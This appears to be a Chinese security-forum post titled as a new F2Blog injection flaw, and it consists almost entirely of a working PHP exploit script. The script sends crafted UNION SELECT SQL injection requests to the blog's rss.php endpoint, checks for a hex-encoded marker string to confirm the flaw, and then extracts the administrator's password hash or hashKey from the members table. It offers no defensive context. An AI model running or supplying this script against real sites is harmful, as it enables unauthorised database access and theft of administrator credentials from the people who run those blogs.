f2blog最新注射漏洞

<?php print_r(" +------------------------------------------------------------------+ Exploit For F2Blog All Version Just For Fun :) +------------------------------------------------------------------+ "); ini_set("max_execution_time",0); error_reporting(7); $blogpath="$argv[2]"; $server="$argv[1]"; $cookie=''; $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"; $type=$argv[3]; $cmd="find=and 1=2 union select 0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C from f2blog_members where role=0x61646D696E/*"; echo "Testting...:\t"; $response=send($cmd,'rss.php?cateID=1'); if(strpos($response,'we love shell')) { echo "Vul\r\n"; } echo "Now Crack the admin\r\n\r\n"; if($type==0){ $cmd="find=and 1=2 union select hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey from f2blog_members where role=0x61646D696E/*"; $response=send($cmd,'rss.php?cateID=1'); preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches); $matches=array_reverse($matches); $matches=array_reverse($matches[0]); if(is_hash($matches[0])) { echo "hash:\t"; die(print_r($matches[0])); } die("Exploit Failed\r\n"); } else{ $cmd="find=and 1=2 union select password,password,password,password,password,password,password,password,password from f2blog_members where role=0x61646D696E/*"; $response=send($cmd,'rss.php?cateID=1'); preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches); $matches=array_reverse($matches); $matches=array_reverse($matches[0]); if(is_hash($matches[0])) { echo "password:\t"; die(print_r($matches[0])); } die("Exploit Failed\r\n"); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } function send($cmd,$path) { global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip; $path=$blogpath."$path"; $message = "POST ".$path." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Referer: http://".$server.$path."\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: ".$useragent."\r\n"; $message .= "Host: ".$server."\r\n"; $message .= "Content-length: ".strlen($cmd)."\r\n"; $message .= "Connection: Keep-Alive\r\n"; $message .= "Cookie: ".$cookie."\r\n"; $message .= "\r\n"; $message .= $cmd."\r\n"; // echo $message; $fd = fsockopen( $server, 80 ); fputs($fd,$message); $resp = "<pre>"; while($fd&&!feof($fd)) { $resp .= fread($fd,1024); } fclose($fd); $resp .="</pre>"; if($debug) {echo $cmd;echo $resp;} // echo $resp; return $resp; } ?>